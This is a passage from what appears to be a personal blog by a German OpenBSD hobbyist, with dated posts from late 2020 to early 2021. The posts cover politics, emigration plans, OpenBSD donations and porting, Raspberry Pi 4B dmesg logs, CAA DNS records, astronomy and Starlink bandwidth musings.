warnings, but it did not mention trespassing. So I'm deeply sorry that I
passed into unchartered/illegal territory. By now it's 18 years later and
I have learned my lesson. The Army is gone by now. A sign could look like
the following:
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
X Achtung! Warnung! U.S. Amerikanischer Truppenuebungsplatz. Nicht X
X Betreten! Scharfe Munition! X
X X
X Warning! Caution! YYYYYYYYY! Do not cross into this territory. X
X Live ammunitions! Yadda yadda yadda. X
X X
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
So this word was somewhere between the YYYYYYYY and the yadda. It made perfect
sense to me at the time of crossing into the territory. But I ignored it.
I'm really curious if the Internet knows what word I'm talking about. It is
not "No trespassing", "Beware" or other simple words. I think it is from the
1940's perhaps. Google doesn't know it. I checked several times.
PS: I dropped a tissue on the field on US soil. Sorry.
True choice: 10 parties+ we got none
November 24th, 2020
The only anti-EU party that exists is the AfD. This is why I may have to
vote for them. I'm not racist, but I will be after this. I have only one
goal, to end this EU. Next federal election is in a year less 1 month. I
have some time to think about his choice.
Solstice and Christmas less than a month away
November 26th, 2020
I'm looking forward to this christmas. I may be doing christmas shopping
next week to get everything done before the big wave of cybershopping slows
down purchases.
Considering emigrating from the European Union
November 26th, 2020
I have since yesterday openly talked to my family about emigrating from the
EU.
Canada
USA
England
Are some candidate destinations. It depends what I can get/give with a
disability.
Why SYSADMIN is no more fun
November 27th, 2020
There is too many laws. To be a successful admin in the EU you have to know
law. May as well have studied law. I'm dropping out. In the next two years
I'm gonna seek a job that isn't so infested with law demand.
Tonight as we crossed into december we got dumped on with snow. I guess the
radio be playing all those jingles and jangles (I personally don't have
radio anymore). It's a magic season to have snow. I cherish it very much.
I'm gonna see if I can catch a glimpse of the full moon as well. Yesterday
it shone bright and clear. I'd like to point people to this nursery rhyme
I played yesterday "Au clair de la lune, mon ami Pierrot". This one on youtube was nicely done.
I remember a friends mom in my youth sang it, she was originally from Quebec.
Remember to donate to OpenBSD
December 1st, 2020
It's almost the end of the year and OpenBSD users and corporate users of OpenBSD
software should put in their share. Be kind to donate to
the OpenBSD
foundation. I have already donated 50 EUR in the beginning of the year
and I'm on hard times currently so there is not much more from me. however
I saw that one person (I met him at eurobsdcon in maarsen in 2011) donated
25K dollars. That's incredible! You rock! Thanks a lot for keeping OpenBSD
alive! Here is my disclaimer: I'm not associated with OpenBSD in any form,
I'm just a big fan of the project.
Administrivia: Added CAA records to centroid.eu zone
December 3rd, 2020
I have added CAA records (which are supported in delphinusdnsd 1.5.0) to
the centroid.eu zone. I'll keep this for 70 days and see if it creates any
problems:
;; ANSWER SECTION:
centroid.eu. 3268 IN CAA 0 issue "letsencrypt.org"
centroid.eu. 3268 IN CAA 0 iodef "mailto:nospam@centroid.eu"
The above is the output of CAA query for centroid.eu.
Have you ever....
December 3rd, 2020
Looked up your own name in Arabic? Greetings, my name is Hadzar. In fact
my name is Hadzar (Xail) al Habber, if I got the translation right. Hadzar
for Stone as in Rock as in Peter; Xail as in horse and al Habber I think
should say lover of horses. But it may not be right.
Why Arabic? Dunno, just thought it'd be cute to know. Also in Chinese I'll
find my name some day. A decade ago+ I bought a few Langenscheid's
(translators), Greek, Latin, Chinese, Arabic and some other language that I
can't think of right now. Obviously not everyone has a translator, so use
google translate, it's pretty good. Cheers!
Lived in my apartment for eight years now
December 6th, 2020
Today is the day I knew I had this apartment, though I didn't move in three
months later in 2013. This is likely the last winter in this apartment as
I've put myself on a waiting list to move after easter. I'm going to a smaller
flat. It was a good time here and I'll cherish every day before I move. It's
a good time to move. 8 years is also a record that I've stayed in any flat
for so long.
Solstice exactly 2 weeks away
December 7th, 2020
Solstice is exactly two
weeks away. Thought I'd share this.
Grand Conjunction between Jupiter and Saturn
December 8th, 2020
Can be seen on the 21st of december (solstice) shortly after dark in the South
West. I saw a University of Exeter clip on youtube regarding this. They will
also be live streaming this event on YT in case you have cloud where you are.
On this day Jupiter and Saturn will be very closely aligned in a perfect line
from stargazers on Earth, Saturn will likely be above Jupiter and it's said
that they are so close that it spans 1/5 of the moons disk. Cheers. BTW
this is an event that occurs every 20 years or so, since jupiter has an orbit
around the sun that takes 11.8 years and saturns orbit takes 29.4 years or so.
It is said that such a close encounter between Saturn and Jupiter won't occur
for another 60 years.
Pure candle light or with monitor light?
December 8th, 2020
As I sit here I watch the candle burning beside me. I'm writing this post
on my computer. A sense of relaxation is about me, outside is nearly twilight
it's getting dark. I never really found that monitors and candle light mix,
but I've been doing this a few days now and it feels good. It's better than
no candle light is what I am thinking.
Today is International day of Human Rights
December 10th, 2020
On chat I was joking around about aliens on earth this morning. Yet there is
something much more important. Human rights day (UN.org) is today, and is associated with
the universal declaration of human rights (of planet earth), this isn't a joke these rights are universal, if you don't know, now you know. Everyone has
a right to know them, violations go against humanity universal laws.
Still if you're an alien on planet earth you should also have rights. Even if
you are a human that time travels you should be protected by these rights. In
my view if you are a time traveller you need to be put into a new clause. In
1948 people did not fathom the Internet or even AI. All AI must adhere to
these rights when dealing with humans, this is very important. It's incredible
that just recently there was a spat with an engineer of google who was "sacked"
regarding some email that mentioned marginalized people. Google should really
get an ethics (if that's a word) committee that adheres to human rights.
Things OpenBSD...
December 14th, 2020
I have two great news:
OpenBSD foundation is $4,000 CAD away from reaching their fundraising goal.
They'll likely make it with two odd weeks left in the year. Congratulations
to OpenBSD! And a big thanks for everyone who donated.
I have committed time from late January to December 2021 to (as a hobby)
attempt a backport from the OpenBSD/powerpc64 architecture to the Apple G5
machine (I'll call it OpenBSD/macppc64 from now on). As I have about a year,
I'll try to make it work. I did have involvement in the RISCV64 group but I
really want to make my G5 work with 4/8 GB of RAM.
I did attempt a G5 port before, in 2018, but failed. Chance has it that I can
reuse some of the files I modified back then in this effort so it wasn't all
wasted time back then. I'll be focusing on the ofwboot bootloader to compile
a FDT binary blob tree on the fly translated from openfirmware. Since both of
these are in compatible trees (I think) this should be straight forward work.
Once I can boot with a FDT blob in memory we don't have to use openfirmware
anymore and can go ahead with simplebus framework that has a lot of support.
It will be enough to at least make the kernel print pretty stuff (like config
dmesg output). Then comes a hard part, the userland. By then OpenBSD will
likely change powerpc64 port to little endian and macppc64 will likely stand
on its own in big endian.
If you have an Apple G5, and know how to program C and asm, I invite you to
work with me. End of January I'm going to put it all available on github.
Solstice is tomorrow
December 20th, 2020
Solstice is tomorrow. Will we also see the "great/grand conjunction"? Looking
out today I have my hopes down for Franconia region of Germany, everything is
overcast.
Earth-Jupiter-Saturn conjunction of 2020
December 22nd, 2020
I missed it, due to bad weather. But I revisited the sight with stellarium:
Since yesterday was also solstice I'd like to show you this apod photo (nasa.gov) that I think is very
well done. Joy for 2020!
Merry Christmas
December 24th, 2020
I wish you a happy time!
Raspberry Pi 4B and Network Map
December 29th, 2020
I got a Raspberry Pi 4B for Christmas from my parents. I'm writing this
blog post on it. Everything works except sound basically.
Here is my updated Network Map:
Related to last post on Raspberry Pi 4B with OpenBSD
December 29th, 2020
I just couldn't help but play with xfig on the RPI.
Happy New Year 2021
January 1st, 2021
I think it's gonna be a good year. New years propositions are that I want to
get a job. I also have started 3 projects already last year. I'm giving
freifunk a shot again. I hope it won't rob too much of my time. Also I have
committed time to attempting to make my G5 run OpenBSD 64-bit. I committed
12 months for that so we'll see. And then there is my DNS server which may
take a backseat to the other projects, meaning, that it may not be done
everything by years end, but most likely next year some time. We'll see how
it all unfolds. So 2021 is like the other years with recycled content. Old
to the new :-).
Microsoft/Outlook/Hotmail is blocking SMTP delivery from centroid.eu
January 01st, 2021
This means I can't mail you. Find another email provider if you want to have
correspondence with me.
Landing on polar Mars, the benefits and drawbacks
January 10th, 2021
In this article
I talked about a mission to phobos instead of mars. But that has the ultimate
drawback of too little gravity. Astronauts doing the trip will need to work
out and replenish their bone marrow and muscles. So landing on Phobos is not
a good idea, we need Mars' gravity.
However, I'm more a proponent of having humans land in a polar region of Mars
the first time AND use the concept of Avatars being stationed around the
equatorial region. This means command and control is in the "white" region and
robots running around near the equator. But why? Because the cold may kill
any bacterial life that we don't want returning to Earth. But it would also
be damn cold for humans so we'd need nuclear generators most likely. I
imagine the first human marstronauts will be inside their habitat controlling
the robots 2000+ kilometers away, and then working on their own health with
gym equipment. A trip out of these modules would be infrequent.
You'll thank me for this brainstorm when no martian virii make it to earth
after the voyage home.
Things I can part from (Schweinfurt schools)
January 12th, 2021
A woman of the Abendrealschule in Nuremberg is looking for computer netbooks
or laptops for her students and asked an organisation that I'm a member of to
provide old equipment. I live in Schweinfurt which is some ways away and we
probably have a similar situation here, where there is students that only have
a smartphone and no access to homeschooling equipment such as a netbook or a
tablet computer. I'm offering my old equipment to a Schweinfurt school if it
is needed.
I have 2 netbooks (one is 9 years old, the other is 6 years old) that I can
part from, in case someone needs a used netbook for home schooling. The
netbooks would need a bit of a cleaning (removal of stickers would require
some cleaning of the exposed gooy surface with something such as "goo-off").
Both would need windows which I don't have any licenses for right now. As far
as I know the built-in cameras all work and all other components do too.
Both have 4 GB RAM minimally, one has a two core AMD 1000 MHz cpu and the
other a 4 core Pentium cpu (1600 MHz?). They both have spinning harddrives.
If you can get cheap windows licenses I can even install windows on them for
your child. Let me know if your child needs one of these.
Raspberry Pi 4B (8 GB) OpenBSD dmesg
January 13th, 2021
On Christmas I got a Raspberry Pi, it's been running a few weeks now. I thought
I'd share the dmesg:
OpenBSD 6.8-current (GENERIC.MP) #952: Sat Dec 26 15:29:26 MST 2020
deraadt@arm64.openbsd.org:/usr/src/sys/arch/arm64/compile/GENERIC.MP
real mem = 8377966592 (7989MB)
avail mem = 8088248320 (7713MB)
random: good seed from bootblocks
mainbus0 at root: ACPI
psci0 at mainbus0: PSCI 1.1, SMCCC 1.2
cpu0 at mainbus0 mpidr 0: ARM Cortex-A72 r0p3
cpu0: 48KB 64b/line 3-way L1 PIPT I-cache, 32KB 64b/line 2-way L1 D-cache
cpu0: 1024KB 64b/line 16-way L2 cache
cpu0: CRC32
cpu1 at mainbus0 mpidr 1: ARM Cortex-A72 r0p3
cpu1: 48KB 64b/line 3-way L1 PIPT I-cache, 32KB 64b/line 2-way L1 D-cache
cpu1: 1024KB 64b/line 16-way L2 cache
cpu1: CRC32
cpu2 at mainbus0 mpidr 2: ARM Cortex-A72 r0p3
cpu2: 48KB 64b/line 3-way L1 PIPT I-cache, 32KB 64b/line 2-way L1 D-cache
cpu2: 1024KB 64b/line 16-way L2 cache
cpu2: CRC32
cpu3 at mainbus0 mpidr 3: ARM Cortex-A72 r0p3
cpu3: 48KB 64b/line 3-way L1 PIPT I-cache, 32KB 64b/line 2-way L1 D-cache
cpu3: 1024KB 64b/line 16-way L2 cache
cpu3: CRC32
efi0 at mainbus0: UEFI 2.7
efi0: https://github.com/pftf/RPi4 rev 0x10000
smbios0 at efi0: SMBIOS 3.3.0
smbios0: vendor https://github.com/pftf/RPi4 version "UEFI Firmware v1.21" date 11/13/2020
smbios0: Raspberry Pi Foundation Raspberry Pi 4 Model B
apm0 at mainbus0
ampintc0 at mainbus0 nirq 256, ncpu 4 ipi: 0, 1: "interrupt-controller"
agtimer0 at mainbus0: tick rate 54000 KHz
acpi0 at mainbus0: ACPI 6.3
acpi0: sleep states
acpi0: tables DSDT FACP CSRT DBG2 GTDT IORT APIC PPTT BGRT
acpi0: wakeup devices
"BCM2849" at acpi0 not configured
"BCM2835" at acpi0 not configured
"BCM2854" at acpi0 not configured
"ACPI0004" at acpi0 not configured
xhci0 at acpi0 XHC0 addr 0x600000000/0x1000 irq 175, xHCI 1.0
usb0 at xhci0: USB revision 3.0
uhub0 at usb0 configuration 1 interface 0 "Generic xHCI root hub" rev 3.00/1.00 addr 1
"ACPI0007" at acpi0 not configured
"ACPI0007" at acpi0 not configured
"ACPI0007" at acpi0 not configured
"ACPI0007" at acpi0 not configured
"ACPI0004" at acpi0 not configured
"BCM2848" at acpi0 not configured
"BCM2850" at acpi0 not configured
"BCM2856" at acpi0 not configured
"BCM2845" at acpi0 not configured
"BCM2841" at acpi0 not configured
"BCM2841" at acpi0 not configured
"BCM2838" at acpi0 not configured
"BCM2839" at acpi0 not configured
"BCM2844" at acpi0 not configured
pluart0 at acpi0 URT0 addr 0xfe201000/0x1000 irq 153
"BCM2836" at acpi0 not configured
"BCM2EA6" at acpi0 not configured
"MSFT8000" at acpi0 not configured
"BCM2847" at acpi0 not configured
"BCM2855" at acpi0 not configured
bse0 at acpi0 ETH0 addr 0xfd580000/0x10000 irq 189: address dc:a6:32:cc:db:a7
brgphy0 at bse0 phy 1: BCM54210E 10/100/1000baseT PHY, rev. 2
"PNP0C06" at acpi0 not configured
acpitz0 at acpi0: critical temperature is 90 degC
simplefb0 at mainbus0: 1920x1080, 32bpp
wsdisplay0 at simplefb0 mux 1: console (std, vt100 emulation)
wsdisplay0: screen 1-5 added (std, vt100 emulation)
uhub1 at uhub0 port 1 configuration 1 interface 0 "VIA Labs USB2.0 Hub" rev 2.10/4.21 addr 2
uhub2 at uhub1 port 2 configuration 1 interface 0 "Asmedia ASM107x" rev 2.10/1.00 addr 3
uhidev0 at uhub2 port 2 configuration 1 interface 0 "American Power Conversion \
Back-UPS CS 650 FW:817.v9.I USB FW:v9" rev 1.10/0.06 addr 4
uhidev0: iclass 3/0, 98 report ids
upd0 at uhidev0
uhub3 at uhub1 port 3 configuration 1 interface 0 "Macally Macally iKey" rev 1.10/0.01 addr 5
uhidev1 at uhub3 port 1 configuration 1 interface 0 "Macally Macally iKey" rev 1.10/0.01 addr 6
uhidev1: iclass 3/1
ukbd0 at uhidev1: 8 variable keys, 6 key codes
wskbd0 at ukbd0: console keyboard, using wsdisplay0
uhidev2 at uhub3 port 2 configuration 1 interface 0 "Logitech USB Optical Mouse" rev 2.00/43.01 addr 7
uhidev2: iclass 3/1
ums0 at uhidev2: 3 buttons, Z dir
wsmouse0 at ums0 mux 0
uaudio0 at uhub1 port 4 configuration 1 interface 1 "Numark DJIO 2" rev 2.00/40.66 addr 8
uaudio0: class v1, full-speed, sync, channels: 4 play, 0 rec, 0 ctls
audio0 at uaudio0
uhub4 at uhub0 port 3 configuration 1 interface 0 "Asmedia ASM107x" rev 3.00/1.00 addr 9
umass0 at uhub4 port 3 configuration 1 interface 0 "ASMT ASM105x" rev 3.00/1.00 addr 10
umass0: using SCSI over Bulk-Only
scsibus0 at umass0: 2 targets, initiator 0
sd0 at scsibus0 targ 1 lun 0: serial.174c55aa12345679B3D8
sd0: 953869MB, 512 bytes/sector, 1953525168 sectors
vscsi0 at root
scsibus1 at vscsi0: 256 targets
softraid0 at root
scsibus2 at softraid0: 256 targets
root on sd0a (8c1699786972c1f6.a) swap on sd0b dump on sd0b
WARNING: clock lost 46 days
WARNING: CHECK AND RESET THE DATE!
The audio card sucks I bought a new one. That'll change in this setup in about
a week or so.
Why does EU need a broadband satellite constellation?
January 14th, 2021
This I don't
understand. Why does EU needs this? We're coming off as copycats and
the fear of this for me is that it will be abused to decouple from the ONE
Internet that we have now. This can't be happening. We're better off
cooperating with American companies to give us broadband than doing our own
and focus on some other things such as search engines and stuff. Or how
about that 5G network? Is it even going to happen still?
Three days compiling definitely paid off
January 14th, 2021
I have compiled iridium browser on my raspberry pi 4B. It worked! I'm in
heaven! I wonder why these ports aren't found in openbsd-snapshot packages
but the 3 days compile time could be a major factor why not.
Here is a photo of me 1997
January 21st, 2021
An ex-girlfriend sent me this:
Thanks to Stacy for this! I was pretty slim back then. It was shortly before
I entered the IT industry and got fat.
Electricity for 2020
January 23rd, 2021
Good news, electricity is down. Bad news, daytime electricity is up and thus
I have to pay extra money to the electric company.
Year
Night
Day
Total
2013
6941
1276
8217
2014
6906
1323
8229
2015
10151
1452
11603
2016
9643
1420
11063
2017
9788
1485
11273
2018
8546
1655
10201
2019
9064
1412
10476
2020
8578
1529
10107
Next year I'll draw a pretty graph, I may be in a different apartment too,
which will have reduced heating costs (1 room less). I'll have to see if
I find anything nice.
First software upgrade of the Raspberry Pi 4B
January 26th, 2021
I have upgraded the software to OpenBSD-current (snapshot). It was mostly
uneventful. sysupgrade didn't work so I did a manual disk upgrade. The
upgrade mostly left the Firmware alone so I was able to get it booting again.
I did make backups of the firmware just in case, and before I rebooted the
upgrade bsd.rd I checked what changed and what didn't. A-OK! I love this
little Pi and OpenBSD makes it so much lovelier! :-)
Internet has hit RFC 9003
January 26th, 2021
Here is a list
of RFC's. Today I noticed we surpassed RFC 9000. The highest RFC is
called RFC 9003.
The study of these RFC's is akin to studying law. I have long given up
trying to stay up to date with all of them, due to burn-out.
Why I probably won't vote in 2021
January 28th, 2021
We need less government not more. The EU represents one more layer of
government and I don't see any other levels of government budging. What I'm
for is someone to acknoledge that this EU we have is problematic instead all
the popular parties that are "kosher-voting" are sleepwalking into this.
Sorry, I'm not gonna be a part of that. Otherwise I'd probably vote the
green party.
Raspberry Pi 4B dmesg again with DeviceTree (FDT) turned on
January 29th, 2021
OpenBSD 6.8-current (GENERIC.MP) #990: Mon Jan 25 15:02:21 MST 2021
deraadt@arm64.openbsd.org:/usr/src/sys/arch/arm64/compile/GENERIC.MP
real mem = 8377847808 (7989MB)
avail mem = 8088076288 (7713MB)
random: good seed from bootblocks
mainbus0 at root: Raspberry Pi 4 Model B Rev 1.4
psci0 at mainbus0: PSCI 1.1, SMCCC 1.2
cpu0 at mainbus0 mpidr 0: ARM Cortex-A72 r0p3
cpu0: 48KB 64b/line 3-way L1 PIPT I-cache, 32KB 64b/line 2-way L1 D-cache
cpu0: 1024KB 64b/line 16-way L2 cache
cpu0: CRC32
cpu1 at mainbus0 mpidr 1: ARM Cortex-A72 r0p3
cpu1: 48KB 64b/line 3-way L1 PIPT I-cache, 32KB 64b/line 2-way L1 D-cache
cpu1: 1024KB 64b/line 16-way L2 cache
cpu1: CRC32
cpu2 at mainbus0 mpidr 2: ARM Cortex-A72 r0p3
cpu2: 48KB 64b/line 3-way L1 PIPT I-cache, 32KB 64b/line 2-way L1 D-cache
cpu2: 1024KB 64b/line 16-way L2 cache
cpu2: CRC32
cpu3 at mainbus0 mpidr 3: ARM Cortex-A72 r0p3
cpu3: 48KB 64b/line 3-way L1 PIPT I-cache, 32KB 64b/line 2-way L1 D-cache
cpu3: 1024KB 64b/line 16-way L2 cache
cpu3: CRC32
efi0 at mainbus0: UEFI 2.7
efi0: https://github.com/pftf/RPi4 rev 0x10000
smbios0 at efi0: SMBIOS 3.3.0
smbios0: vendor https://github.com/pftf/RPi4 version "UEFI Firmware v1.21" date 11/13/2020
smbios0: Raspberry Pi Foundation Raspberry Pi 4 Model B
apm0 at mainbus0
"system" at mainbus0 not configured
"axi" at mainbus0 not configured
simplebus0 at mainbus0: "soc"
bcmclock0 at simplebus0
bcmmbox0 at simplebus0
bcmgpio0 at simplebus0
bcmaux0 at simplebus0
ampintc0 at simplebus0 nirq 256, ncpu 4 ipi: 0, 1: "interrupt-controller"
bcmtmon0 at simplebus0
bcmdmac0 at simplebus0: DMA0 DMA2 DMA4 DMA5 DMA6 DMA7 DMA8 DMA9
"timer" at simplebus0 not configured
bcmirng0 at simplebus0
pluart0 at simplebus0
com0 at simplebus0: ns16550, no working fifo
"local_intc" at simplebus0 not configured
bcmdog0 at simplebus0
simplebus1 at simplebus0: "firmware"
"clocks" at simplebus1 not configured
"gpio" at simplebus1 not configured
"power" at simplebus0 not configured
"mailbox" at simplebus0 not configured
sdhc0 at simplebus0
sdhc0: SDHC 3.0, 250 MHz base clock
sdmmc0 at sdhc0: 4-bit, sd high-speed, mmc high-speed
"gpiomem" at simplebus0 not configured
"fb" at simplebus0 not configured
"vcsm" at simplebus0 not configured
"clocks" at mainbus0 not configured
"phy" at mainbus0 not configured
simplebus2 at mainbus0: "emmc2bus"
sdhc1 at simplebus2
sdhc1: SDHC 3.0, 100 MHz base clock
sdmmc1 at sdhc1: 8-bit, sd high-speed, mmc high-speed, ddr52, dma
"arm-pmu" at mainbus0 not configured
agtimer0 at mainbus0: 54000 kHz
simplebus3 at mainbus0: "scb"
bcmpcie0 at simplebus3
pci0 at bcmpcie0
ppb0 at pci0 dev 0 function 0 "Broadcom BCM2711" rev 0x10
pci1 at ppb0 bus 1
xhci0 at pci1 dev 0 function 0 "VIA VL805 xHCI" rev 0x01: intx, xHCI 1.0
usb0 at xhci0: USB revision 3.0
uhub0 at usb0 configuration 1 interface 0 "VIA xHCI root hub" rev 3.00/1.00 \
addr 1
bse0 at simplebus3: address dc:a6:32:cc:db:a7
brgphy0 at bse0 phy 1: BCM54210E 10/100/1000baseT PHY, rev. 2
"dma" at simplebus3 not configured
"hevc-decoder" at simplebus3 not configured
"rpivid-local-intc" at simplebus3 not configured
"h264-decoder" at simplebus3 not configured
"vp9-decoder" at simplebus3 not configured
"leds" at mainbus0 not configured
"sd_io_1v8_reg" at mainbus0 not configured
"fixedregulator_3v3" at mainbus0 not configured
"fixedregulator_5v0" at mainbus0 not configured
simplebus4 at mainbus0: "v3dbus"
"clk-108M" at mainbus0 not configured
"sd_vcc_reg" at mainbus0 not configured
simplefb0 at mainbus0: 1920x1080, 32bpp
wsdisplay0 at simplefb0 mux 1: console (std, vt100 emulation)
wsdisplay0: screen 1-5 added (std, vt100 emulation)
sdmmc1: can't enable card
uhub1 at uhub0 port 1 configuration 1 interface 0 "VIA Labs USB2.0 Hub" \
rev 2.10/4.21 addr 2
uhidev0 at uhub1 port 1 configuration 1 interface 0 "American Power \
Conversion Back-UPS CS 650 FW:817.v9.I USB FW:v9" rev 1.10/0.06 addr 3
uhidev0: iclass 3/0, 98 report ids
upd0 at uhidev0
uhub2 at uhub1 port 2 configuration 1 interface 0 "Asmedia ASM107x" rev \
2.10/1.00 addr 4
sdmmc0: can't enable card
uhub3 at uhub1 port 3 configuration 1 interface 0 "Apple, Inc. Keyboard \
Hub" rev 2.00/96.15 addr 5
uhidev1 at uhub3 port 2 configuration 1 interface 0 "Apple Inc. Apple \
Keyboard" rev 2.00/0.74 addr 6
uhidev1: iclass 3/1
ukbd0 at uhidev1: 8 variable keys, 5 key codes, country code 13
wskbd0 at ukbd0: console keyboard, using wsdisplay0
uhidev2 at uhub3 port 2 configuration 1 interface 1 "Apple Inc. Apple \
Keyboard" rev 2.00/0.74 addr 6
uhidev2: iclass 3/0
uhid0 at uhidev2: input=1, output=0, feature=0
uhidev3 at uhub3 port 3 configuration 1 interface 0 "Logitech USB Optical \
Mouse" rev 2.00/43.01 addr 7
uhidev3: iclass 3/1
ums0 at uhidev3: 3 buttons, Z dir
wsmouse0 at ums0 mux 0
uaudio0 at uhub1 port 4 configuration 1 interface 1 "TerraTec Electronic \
GmbH Aureon 7.1 USB" rev 1.10/0.10 addr 8
uaudio0: class v1, full-speed, sync, channels: 8 play, 2 rec, 25 ctls
audio0 at uaudio0
uhidev4 at uhub1 port 4 configuration 1 interface 3 "TerraTec Electronic \
GmbH Aureon 7.1 USB" rev 1.10/0.10 addr 8
uhidev4: iclass 3/0
uhid1 at uhidev4: input=3, output=4, feature=0
uhub4 at uhub0 port 3 configuration 1 interface 0 "Asmedia ASM107x" rev \
3.00/1.00 addr 9
umass0 at uhub4 port 3 configuration 1 interface 0 "ASMT ASM105x" rev 3.00/1.00 addr 10
umass0: using SCSI over Bulk-Only
scsibus0 at umass0: 2 targets, initiator 0
sd0 at scsibus0 targ 1 lun 0: serial.174c55aa12345679B3D8
sd0: 953869MB, 512 bytes/sector, 1953525168 sectors
vscsi0 at root
scsibus1 at vscsi0: 256 targets
softraid0 at root
scsibus2 at softraid0: 256 targets
root on sd0a (8c1699786972c1f6.a) swap on sd0b dump on sd0b
WARNING: clock lost 76 days
WARNING: CHECK AND RESET THE DATE!
gpio0 at bcmgpio0: 58 pins
Starlink Internet...back to Internet Cafe's?
January 30th, 2021
The other day I was watching a very informative youtube report from an indian
lady. She made me aware that a starlink sat can only throughput/relay about
20 Gbit/s (not sure where that number comes from but let's go with it).
Then if starlink satellites are 1000 km spaced apart in orbits covering the
USA, that means there is only 5 coast to coast, in 3 rows so 15 satellites
over the USA at any point in time. So let's crunch the numbers:
(15 * 20Gbit/s == 300000 Mbit/s) which has customers downloading at 150 Mbit/s
which is 2000 user terminals USA wide. But all internet is oversold and after
loading a webpage there is some pause. So let's say you can have a user ratio
of 10:1, that's 20,000 terminals/dishys on earth. At this rate it becomes
clear that the "other 40%" of Internet users won't be reached. The lady goes
on to say that other data plans are likely. So 15 Mbit/s perhaps. That would
put it in the range of other satellite operators and 200,000 users in the USA.
So SpaceX has to either increase the capacity on the satellites (> 20 Gbit/s)
or run more satellites through the USA (in orbit).
Let's look at what starlink is good at. Low latencies. This means that
predominantly VOIP can profit off a starlink but a large download probably not
so much, large downloads can probably be done on high latency links.
Fortunately a phone call is only about 100Kbit/s or so, and that's a high
quality phone call. This means you can have a datacenter of around 150
telephone operators at 15 Mbit/s, if you want data then you probably will have
to buy more capacity. Let's look at starlink on a sub-continent like India.
India is a lot smaller than the USA and there may only be 5-6 satellites above
it at any given time. And this is where I envision Internet cafes popping up
again utilizing starlink. In fact did Internet cafes ever really leave Asia?
Internet is still rare in such places thus it may make sense to smartly use
Internet differently. Perhaps one or two starlink uplinks and a wifi-mesh for
open community networks?
I'd get starlink but I don't really need it. The highest bandwith I can get
at home is 250 Mbit/s VDSL (cable can't come into my building otherwise it'd
be higher), and I'll likely stick with the VDSL as long as I have this
apartment. As a backup link I use the vodafone flex package. It means I don't
pay until I use it. And i haven't used it in at least a few dozen months.
When I used it I got 7.5 Mbit/s last over LTE. Unless vodafone did some
upgrades in the last two years that is what I expect it to be. I will only
pull it out until I really need it. ie. longer power outtages or me moving
apartments which may mean some downtime from Internet. I'm very happy though
that I'm making bandwidth for the next person in a village not far from me that
has a 8 Mbit/s download only he or she may need starlink more than me.
14 days away from 8 years in this apartment
January 31st, 2021
On Feb 13th, 2013
I moved into this apartment. It will be eight years soon, and it's the longest
time I've been anywhere in my life in one length. However I don't know if I'll
have a ninth year here, I've signed up for looking for a new smaller flat after
easter. Hopefully it will be near this area. Times are rougher for me now
than they were eight years ago, but I'm hanging in there. Hopefully I'll find
a real good work soon so that I can have an outlook on my remaining life. I'm
turning 45 years old in March.
3 months "Funkstille"
February 2nd, 2021
After three months of no word from arbeitsagentur.de I got an automated mailing
from them again with a job recommendation. It looks as if they changed a
flag on my profile. Wonder what's up with that.
Making my C Primer available to all
February 3rd, 2021
Between 2004 and 2017 I wrote on a C primer at hackepedia. Then I took that
and formatted it nicely and corrected it a little bit.
I'm making it available for the first time
here. Enjoy!
New Transatlantic cable owned by Google
February 4th, 2021
This 250 Tbit/s cable is privately
owned by Google. It's amazing high capacity, at least to me.
Thinking of GAIA Blobs
February 6th, 2021
I have this crazy idea to make a distributed database of GAIA DR2 data (roughly
600 GB).
The data (a record or star) looks something like this and this is the wc
count (496 bytes) of it:
Noncompressed the data is about 884 bytes. I'm thinking of sticking this into
DNS data as a compressed blob that is then uuencode which is roughly 675 bytes.
I'm envisaging this entire data being split up and distributed around 864 cities
in the EU. So that when you query the entire database it has 864 sources to
answer from via the Internet. The data may get cached in DNS servers too
speeding lookup. I know a DNS person would look at me weirdly and caution not
to put everything in DNS but this is for our stars in the galaxy! Surely it's
good data. Transport would be over UDP for small records but there could be
records that are huge. I envisage up to about 100 GAIA blobs served over TCP.
Anyhow, when I have the protocol implementation I'll approach some astronomical
societies and pitch it to them. Perhaps in the next 2-3 years.
Once the distributed database is built, it can be used by astro software for
cross-referencing. These are in-memory databases only. I figured 800 odd
raspberry pi 4b's with 8 GB RAM would be enough. I can't shoulder this cost
alone but if everyone chips in it's manageable.
35 Years of Personal Computing History
February 7th, 2021
Here is a list of computers I had the pleasure of purchasing
before 2020
2x Intel P-II-350,1x Sinclair ZX-81,1x PC-Engines APU 4,1x PC-Engines APU 2,
1x Intel Xeon E3-,1x Intel Pentium 200,1x Intel Pentium 120,
1x Intel Core i7 4core,1x Intel Atom N270,1x IBM-PC 486-66DX2,
1x IBM-PC 386-SX25,1x Commodore C-64,1x Celeron CPU N2940,1x Apple Mac mini,
1x Apple MBP Core i5,1x Apple G4 Cube,1x Apple G3 iBook,1x AMD C-60 "Ontario",
1x AMD Athlon64 3500+,1x AMD Athlon 1000, 1x Core i3 NUC, 1x Core i3 Workstation
1x Apple G5 PowerMac
The approximate aggregated clockspeed was 60000 MHz and aggregated memory was
roughly 100 GB. 2021 marked 35 years of personal computing history.
Computers since 2021 I have received or purchased:
I'm considering making a 6-8 node raspberry pi cluster. This is with a
RPI 4b - 8 GB or better category SBC's. The idea was born
a few years ago.
So, if I'm in employment in 2 years I'll fulfill this, otherwise I'll be
short on pi's. We'll see. RISC-V is taking off so I'll see if I can get
some RV SBC's instead of Raspberry Pi's if they are worth getting. It stays
fun either way!
Grafenrheinfeld Reactors hold no fuel anymore
February 10th, 2021
According to this (german)
the fuel rods have all been removed from the local nuclear fission reactor,
which was closed down in 2015. Oh my goodness it took almost 6 years! My
question that I'll shoot off into the ether is, when will they wreck the
towers and buildings? What will become of the site? How much longer will
nuclear waste be held there? Will nuclear waste from other power stations
be held there? These are all questions that make me go hmmm. I had seen
job openings of companies that are near there, but because of their close
vicinity to this nuclear site I did not want to work there. Basically the
sooner it's gone the better. Erect a wind or solar park there or something,
I wouldn't want the site be used for anything else. Also see the
following articles here: good weather ahead?.
I'm a hoarder and I'm a tech hoarder
February 12th, 2021
At home I rarely like to throw things out. Like recyclable garbage. I want
you to take a look at this youtube clip (linus tech tips)
can you identify yourself with this persons household? If you can, you're like
me too. I stopped counting how many things I have with a CPU chip, (over 15?).
On top of that I see a couple burned out lightbulbs in front of me, why haven't
I thrown them out? Well for one I'm confused on the recycle policy, so it's
